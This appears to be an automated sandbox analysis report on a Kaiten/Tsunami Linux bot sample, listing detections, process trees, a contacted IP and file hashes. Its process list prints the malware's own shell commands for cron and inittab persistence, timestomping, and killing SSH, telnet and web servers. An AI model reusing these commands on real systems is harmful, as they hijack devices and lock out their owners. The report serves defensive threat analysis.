Analysis Overview
SHA256
8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1
Threat Level: Known bad
The file irq2 was found to be: Known bad.
Malicious Activity Summary
Detects Kaiten/Tsunami Payload
Kaiten family
Kaiten/Tsunami
Creates/modifies Cron job
Enumerates running processes
Indicator Removal: Timestomp
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 11:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 11:41
Reported
2024-10-27 11:44
Platform
debian12-mipsel-20240221-en
Max time kernel
36s
Max time network
12s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Kaiten family
Kaiten/Tsunami
Creates/modifies Cron job
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /var/spool/cron/crontabs/tmp.EzCKHu | /usr/bin/crontab | N/A |
Enumerates running processes
Indicator Removal: Timestomp
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/touch | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/touch | N/A |
| N/A | N/A | /bin/sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/33 | /usr/bin/killall | N/A |
| File opened for reading | /proc/30/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/829 | /usr/bin/killall | N/A |
| File opened for reading | /proc/6 | /usr/bin/killall | N/A |
| File opened for reading | /proc/341 | /usr/bin/killall | N/A |
| File opened for reading | /proc/33 | /usr/bin/killall | N/A |
| File opened for reading | /proc/42 | /usr/bin/killall | N/A |
| File opened for reading | /proc/6 | /usr/bin/killall | N/A |
| File opened for reading | /proc/29 | /usr/bin/killall | N/A |
| File opened for reading | /proc/22 | /usr/bin/killall | N/A |
| File opened for reading | /proc/831 | /usr/bin/killall | N/A |
| File opened for reading | /proc/26 | /usr/bin/killall | N/A |
| File opened for reading | /proc/679/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/47/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/115 | /usr/bin/killall | N/A |
| File opened for reading | /proc/354/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/18 | /usr/bin/killall | N/A |
| File opened for reading | /proc/698 | /usr/bin/killall | N/A |
| File opened for reading | /proc/841/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/24 | /usr/bin/killall | N/A |
| File opened for reading | /proc/341 | /usr/bin/killall | N/A |
| File opened for reading | /proc/137/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/851 | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/10 | /usr/bin/killall | N/A |
| File opened for reading | /proc/24 | /usr/bin/killall | N/A |
| File opened for reading | /proc/27/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/180 | /usr/bin/killall | N/A |
| File opened for reading | /proc/10/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/34/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/450/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4 | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4 | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/31/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/systemctl | N/A |
| File opened for reading | /proc/813 | /usr/bin/killall | N/A |
| File opened for reading | /proc/37 | /usr/bin/killall | N/A |
| File opened for reading | /proc/732/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/11 | /usr/bin/killall | N/A |
| File opened for reading | /proc/44/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/59/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/13 | /usr/bin/killall | N/A |
| File opened for reading | /proc/42/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/114 | /usr/bin/killall | N/A |
| File opened for reading | /proc/809 | /usr/bin/killall | N/A |
| File opened for reading | /proc/5 | /usr/bin/killall | N/A |
| File opened for reading | /proc/818 | /usr/bin/killall | N/A |
| File opened for reading | /proc/114 | /usr/bin/killall | N/A |
| File opened for reading | /proc/26 | /usr/bin/killall | N/A |
| File opened for reading | /proc/818/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/47 | /usr/bin/killall | N/A |
| File opened for reading | /proc/2 | /usr/bin/killall | N/A |
| File opened for reading | /proc/114 | /usr/bin/killall | N/A |
| File opened for reading | /proc/710/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/710/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4 | /usr/bin/killall | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/30/stat | /usr/bin/killall | N/A |
Processes
/tmp/irq2
[/tmp/irq2]
/bin/sh
[sh -c touch -acmr /bin/ls /tmp/irq2]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/irq2]
/bin/sh
[sh -c (crontab -l | grep -v "/tmp/irq2" | grep -v "no cron" | grep -v "lesshts/run.sh" > /var/run/.x00740882966) > /dev/null 2>&1]
/usr/bin/crontab
[crontab -l]
/usr/bin/grep
[grep -v /tmp/irq2]
/usr/bin/grep
[grep -v no cron]
/usr/bin/grep
[grep -v lesshts/run.sh]
/bin/sh
[sh -c echo "* * * * * /tmp/irq2 > /dev/null 2>&1 &" >> /var/run/.x00740882966]
/bin/sh
[sh -c crontab /var/run/.x00740882966]
/usr/bin/crontab
[crontab /var/run/.x00740882966]
/bin/sh
[sh -c rm -rf /var/run/.x00740882966]
/usr/bin/rm
[rm -rf /var/run/.x00740882966]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/tmp/irq2" > /etc/inittab2]
/usr/bin/cat
[cat /etc/inittab]
/usr/bin/grep
[grep -v /tmp/irq2]
/bin/sh
[sh -c echo "0:2345:respawn:/tmp/irq2" >> /etc/inittab2]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/usr/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c /bin/uname -n]
/bin/uname
[/bin/uname -n]
/bin/sh
[sh -c /bin/uname -n]
/bin/uname
[/bin/uname -n]
/bin/sh
[sh -c /bin/uname -n]
/bin/uname
[/bin/uname -n]
/bin/sh
[sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &]
/bin/sh
[sh -c service httpd stop > /dev/null 2>&1 &]
/usr/bin/cat
[cat /var/run/httpd.pid]
/bin/sh
[sh -c killall -9 mini_httpd > /dev/null 2>&1 &]
/usr/sbin/service
[service httpd stop]
/bin/sh
[sh -c killall -9 minihttpd > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 mini_httpd]
/usr/bin/basename
[basename /usr/sbin/service]
/bin/sh
[sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 minihttpd]
/usr/bin/basename
[basename /usr/sbin/service]
/bin/sh
[sh -c nvram set httpd_enable=0 > /dev/null 2>&1]
/usr/bin/cat
[cat /var/run/thttpd.pid]
/usr/bin/systemctl
[systemctl list-unit-files --full --type=socket]
/usr/bin/sed
[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/bin/sh
[sh -c nvram set http_enable=0 > /dev/null 2>&1]
/bin/sh
[sh -c killall -9 httpd > /dev/null 2>&1 &]
/bin/sh
[sh -c service telnetd stop > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 httpd]
/bin/sh
[sh -c service sshd stop > /dev/null 2>&1 &]
/usr/sbin/service
[service telnetd stop]
/usr/sbin/service
[service sshd stop]
/bin/sh
[sh -c killall -9 telnetd > /dev/null 2>&1 &]
/usr/bin/basename
[basename /usr/sbin/service]
/usr/bin/basename
[basename /usr/sbin/service]
/bin/sh
[sh -c killall -9 utelnetd > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 telnetd]
/usr/bin/basename
[basename /usr/sbin/service]
/usr/bin/basename
[basename /usr/sbin/service]
/bin/sh
[sh -c killall -9 dropbear > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 utelnetd]
/bin/sh
[sh -c killall -9 sshd > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 dropbear]
/usr/bin/sed
[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/usr/bin/systemctl
[systemctl list-unit-files --full --type=socket]
/usr/bin/sed
[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/usr/bin/systemctl
[systemctl list-unit-files --full --type=socket]
/usr/bin/killall
[killall -9 sshd]
/bin/sh
[sh -c killall -9 lighttpd > /dev/null 2>&1 &]
/usr/bin/killall
[killall -9 lighttpd]
/usr/local/sbin/systemctl
[systemctl stop httpd.service]
/usr/local/bin/systemctl
[systemctl stop httpd.service]
/usr/sbin/systemctl
[systemctl stop httpd.service]
/usr/bin/systemctl
[systemctl stop httpd.service]
/usr/local/sbin/systemctl
[systemctl stop telnetd.service]
/usr/local/bin/systemctl
[systemctl stop telnetd.service]
/usr/sbin/systemctl
[systemctl stop telnetd.service]
/usr/bin/systemctl
[systemctl stop telnetd.service]
/usr/local/sbin/systemctl
[systemctl stop sshd.service]
/usr/local/bin/systemctl
[systemctl stop sshd.service]
/usr/sbin/systemctl
[systemctl stop sshd.service]
/usr/bin/systemctl
[systemctl stop sshd.service]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| RU | 195.133.232.91:8080 | | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
Files
memory/743-1-0x00400000-0x005777e8-memory.dmp
/run/.x00740882966
| MD5 | 65c1bbfcb74ec6f5c0efb513ebf1e69d |
| SHA1 | a7a758354c25c91d88d9da83f90552bd9f973e9b |
| SHA256 | 5ca8963c17b0b8ff4dc3d6ac469b22eed780405b6574ab26b7da3074cc089001 |
| SHA512 | b86ac43a202e47d1ec305904b7227f9c5b32389b7702f9fa0856674812ae7c33f9a410901b14f6e9428fc14428c5adfaac20690d4d74c8755582566890e06abc |
/var/spool/cron/crontabs/tmp.EzCKHu
| MD5 | 86914499bb6f61e546b730041a1f6ed9 |
| SHA1 | 984e52fa12f9fda8c27d801a350158e1a3345d7b |
| SHA256 | c69f56374b512e816ad31ea035f4ae2f16127096a52e359457982b0ddf3fa1c1 |
| SHA512 | 129913a5dbe6e6bb5fabab4e5a76291af0cf8f457f820dba725bf569411902df82a54ccb16978aa1f0b8d2caa27b8511a2ec6c2c637a59d4b4822947207499b9 |
/etc/inittab2
| MD5 | 23a6588a2dbaf98c20dd9ad548f99576 |
| SHA1 | 1d4504154b3abcef8b652f4832de895669737941 |
| SHA256 | 6c7a9e9b6883cbcff02f673e5fb8bcdbe0b23459f0e063b80cba76ad22b1aff0 |
| SHA512 | de52be0bb66cc880f2cdd0cfc9d47949cbfa161a286d48d22fc22b42f484fcdb4317f34ee05194ab8f61b54e444d04c69459c5bb2fa4ebf8542194949fbc4837 |